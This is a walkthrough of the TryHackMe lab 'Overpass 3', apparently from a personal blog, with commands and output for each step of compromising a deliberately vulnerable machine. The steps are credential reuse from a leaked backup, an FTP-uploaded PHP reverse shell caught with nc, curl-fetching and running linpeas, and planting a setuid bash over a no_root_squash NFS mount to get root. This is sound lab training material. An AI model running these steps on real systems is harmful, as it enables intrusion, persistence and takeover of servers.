- Room: Overpass 3 - Hosting
- Difficulty: Medium
- URL: https://tryhackme.com/room/overpass3hosting
After Overpass's rocky start in infosec, and the commercial failure of their password manager and subsequent hack, they've decided to try a new business venture. Overpass has become a web hosting company! Unfortunately, they haven't learned from their past mistakes. Rumour has it, their main web server is extremely vulnerable.
I started by looking at opened ports on the machine. The room description mentions a vulnerable web server, but there might be other interesting ports.
nmap -A -oN nmap.txt target # Nmap 7.91 scan initiated Fri Mar 19 19:59:02 2021 as: nmap -A -oN nmap.txt target Nmap scan report for target (10.10.146.68) Host is up (0.62s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA) | 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA) |_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) |_http-title: Overpass Hosting Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 19 20:00:36 2021 -- 1 IP address (1 host up) scanned in 93.72 seconds
The machine as port 21 (FTP), 22 (SSH) and 80 (HTTP) opened.
I started by looking at the web site.
It’s a static site, without much on it. There is a list of name, maybe they can be used as usernames?
I found this little gem in the home page source code. Make sure your read the contract when your hosting company promise 5 nines.
We promise a 5 nines uptime, <!-- 0.99999% is 5 nines, right? -->and negotiable service level agreements down to of a matter of days to keep your business running smoothly even when technology gets in the way.
Other than then potential usernames, there was nothing that I could use on the home pages, and no links to other pages. Next, I tried finding hidden pages.
gobuster dir -e -u http://target.com/.com/ -t30 -w /usr/share/dirb/wordlists/common.txt | tee gobuster.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://target.com/.com/ [+] Method: GET [+] Threads: 30 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Expanded: true [+] Timeout: 10s =============================================================== 2021/03/19 20:05:35 Starting gobuster in directory enumeration mode =============================================================== http://target.com/.com/.htpasswd (Status: 403) [Size: 218] http://target.com/.com/.hta (Status: 403) [Size: 213] http://target.com/.com/.htaccess (Status: 403) [Size: 218] http://target.com/.com/backups (Status: 301) [Size: 230] [--> http://target.com//backups/] http://target.com//cgi-bin/ (Status: 403) [Size: 217] http://target.com//index.html (Status: 200) [Size: 1770] =============================================================== 2021/03/19 20:06:20 Finished ===============================================================
There was three folders found by Gobuster.
The backups folder contained a file called backup.zip. I downloaded the file and uncompressed it. It contained an encrypted xlsx file, and the private key to decrypt it.
I imported the key, then used it to decypt the file.
$ unzip backup.zip Archive: backup.zip extracting: CustomerDetails.xlsx.gpg inflating: priv.key $ gpg --import priv.key gpg: key C9AE71AB3180BC08: public key "Paradox <email@example.com>" imported gpg: key C9AE71AB3180BC08: secret key imported gpg: Total number processed: 1 gpg: imported: 1 gpg: secret keys read: 1 gpg: secret keys imported: 1 $ gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08 "Paradox <firstname.lastname@example.org>" $ file CustomerDetails.xlsx CustomerDetails.xlsx: Microsoft Excel 2007+
The spreadsheet contains customer names, usernames, passwords, and credit cards information.
|Customer Name||Username||Password||Credit card number||CVC|
|Par. A. Doxx||paradox||PASSWORD||4111 1111 4555 1142||432|
|0day Montgomery||0day||PASSWORD||5555 3412 4444 1115||642|
|Muir Land||muirlandoracle||PASSWORD||5103 2219 1119 9245||737|
/icons folder contained some icons and some text explaining their use. I seems to be an old default Apache page (Nmap identified version 2.4.37).
/cgi-bin/ did not have directory listing enabled.
I ran Gobuster on the 3 found folders, but it did not found anything else of interest.
Getting a Shell
I had a bunch of credentials, so I tried them on the FTP server to see if any works.
I tried paradox’s credentials first and it worked. The server contained the source to the website and the backup.zip folder.
The other 2 sets of credentials did not work.
I also tried to the credentials to connect by ssh. They all got rejected.
I connected back to the FTP as paradox and took a closer look at the listing to see if I missed anything.
ftp target Connected to target. 220 (vsFTPd 3.0.3) Name (target:ehogue): paradox 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 3 48 48 94 Mar 20 15:26 . drwxrwxrwx 3 48 48 94 Mar 20 15:26 .. drwxr-xr-x 2 48 48 24 Nov 08 21:25 backups -rw-r--r-- 1 0 0 65591 Nov 17 20:42 hallway.jpg -rw-r--r-- 1 0 0 1770 Nov 17 20:42 index.html -rw-r--r-- 1 0 0 576 Nov 17 20:42 main.css -rw-r--r-- 1 0 0 2511 Nov 17 20:42 overpass.svg
It looks like the folder might be writable. I tried uploading a file and it worked. I didn’t know which language, if any, would be supported by the server. So I tried uploading a simple PHP file to see if it would be interpreted, or if the code would just be printed.
cat test.php <?php echo 'It works';
put test.php local: test.php remote: test.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 24 bytes sent in 0.00 secs (40.4095 kB/s)
Uploading the file worked. Now I tried accessing it in a browser by going to http://target.com/test.php . The page showed me ‘It works’. So that confirmed that PHP code was executed.
To get a shell on the server, I uploaded the PHP reverse shell from
/usr/share/webshells/php/php-reverse-shell.php, started a Netcat listener on my machine and navigated to http://target.com/php-reverse-shell.php .
nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.30.1 35038 Linux ip-10-10-30-1 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 15:35:48 up 2:15, 0 users, load average: 0.00, 0.00, 0.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: cannot set terminal process group (896): Inappropriate ioctl for device sh: no job control in this shell sh-4.4$ whoami whoami apache sh-4.4$ pwd / pwd sh-4.4$ cd cd sh-4.4$ pwd /usr/share/httpd pwd sh-4.4$ ls -l ls -l total 20 drwxr-xr-x. 3 root root 4096 Nov 8 2020 error drwxr-xr-x. 3 root root 8192 Nov 8 2020 icons drwxr-xr-x. 3 root root 140 Nov 8 2020 noindex -rw-r--r--. 1 root root 38 Nov 17 2020 web.flag sh-4.4$ cat web.flag cat web.flag WEB FLAG
I had access to the machine, and the first flag.
Escalation to paradox
Now that I had access to the server, I needed to get access to a user account.
There are two users on the server: james and paradox. We have passwords found in the file from earlier, so I tried them with
su. The credentials for paradox worked. None of the passwords worked for james.
$ su paradox Password: [paradox@ip-10-10-30-1 /]$ whoami paradox
I copied my public key to paradox’s authorized_keys. So I was able to reconnect directly using ssh.
echo "MY_PULIC_KEY" > ~/.ssh/authorized_keys
Getting the User Flag
The home folder for paradox contains files with the customer information we found in the backups folder of the web site.
ssh paradox@target Last login: Sat Mar 20 17:00:24 2021 [paradox@ip-10-10-30-1 ~]$ ls -la total 56 drwx------. 4 paradox paradox 203 Nov 18 18:29 . drwxr-xr-x. 4 root root 34 Nov 8 19:34 .. -rw-rw-r--. 1 paradox paradox 13353 Nov 8 21:23 backup.zip lrwxrwxrwx. 1 paradox paradox 9 Nov 8 21:45 .bash_history -> /dev/null -rw-r--r--. 1 paradox paradox 18 Nov 8 2019 .bash_logout -rw-r--r--. 1 paradox paradox 141 Nov 8 2019 .bash_profile -rw-r--r--. 1 paradox paradox 312 Nov 8 2019 .bashrc -rw-rw-r--. 1 paradox paradox 10019 Nov 8 20:37 CustomerDetails.xlsx -rw-rw-r--. 1 paradox paradox 10366 Nov 8 21:18 CustomerDetails.xlsx.gpg drwx------. 4 paradox paradox 132 Nov 8 21:18 .gnupg -rw-------. 1 paradox paradox 3522 Nov 8 21:16 priv.key drwx------ 2 paradox paradox 47 Nov 18 18:32 .ssh
I couldn’t tell if there were the same version I found earlier. So I used scp to download them on my box and look at them.
$ scp paradox@target:~/backup.zip . $ scp paradox@target:~/CustomerDetails.xlsx . $ scp paradox@target:~/CustomerDetails.xlsx.gpg .
This gave me 3 versions of the CustomerDetails spreadsheet. One directly in the home folder, one encrypted, and one in the zip file. They all appeared to contain the same data. So I had to keep looking.
I spend some time looking around the server and did not find anything. So I decided to try if LinPEAS would find something.
I started a web server on my machine.
sudo python3 -m http.server 80
Then use it to download the script on the target server. And then run it.
curl http://10.13.3.36/linpeas.sh -o linpeas.sh chmod +x linpeas.sh ./linpeas.sh | tee linpeasRes.txt
Since linpeas take some time to run, and output a lot of data, I always redirect it’s output to a file. This way I can go back to look at it. And I can download it to my machine.
Note that LinPEAS produces colored text. So you can’t opened it in the text editor. Use
less -r linpeasRes.txt to read it.
LinPEAS found a possible problem with the NFS export
The provided link has two possible exploits, one for remote, and one for local exploitation.
I tried running the remote exploit, but I couldn’t connect to it. The NFS port was closed.
root@kali:~# mkdir /tmp/pe root@kali:~# mount -t nfs target:/ /tmp/pe mount.nfs: Connection timed out
I tried the local exploit, but the target machine does not have gcc installed. The page note that the remote exploit will work though a ssh tunnel, so I decided to try that first.
I looked for the port used by NFS.
[paradox@ip-10-10-237-235 ~]$ rpcinfo -p | grep nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 3 tcp 2049 nfs_acl
And opened a ssh tunnel for this port
ssh -L 2049:localhost:2049 paradox@target
Then I followed the instructions to mound the NFS locally as root.
root@kali:~# sudo apt install libnfs-utils root@kali:~# mount -t nfs localhost:/ /tmp/pe root@kali:~# ls /tmp/pe/ user.flag root@kali:~# cat /tmp/pe/user.flag USER FLAG
I had the home folder of james locally with the user flag in it.
To get root, I followed the instructions from HackTricks to upload a bash binary with suid set as root.
$ cd /tmp/pe $ cp /bin/bash . $ chmod +s bash
Because of the
no_root_squash option on the NFS mount, james’ home folder now contained a bash executable owned by root with the suid bit set. So if james ran it, it will run as root.
I did not have james password, but since I had their home folder mounted, I could see their ssh private key. And use it to connect to the server as james.
$ ls /tmp/pe/.ssh/ authorized_keys id_rsa id_rsa.pub $ ssh james@target -i /tmp/pe/.ssh/id_rsa Last failed login: Sat Jun 5 13:55:53 BST 2021 on pts/1 There were 4 failed login attempts since the last successful login. Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
Once connected, I could run the version of bash that has the suid bit set to become root and get the last flag.
[james@ip-10-10-237-235 ~]$ ./bash -p ./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash) bash-5.1# whoami root bash-5.1# cat /root/root.flag ROOT FLAG
The Overpass Series
That was the last room of the Overpass series. I have done the first two a while ago. From memory they were easier than this one. I should probably redo then and do a writeup for them also.
I really enjoyed the series, thanks to NinjaJc01 for creating it.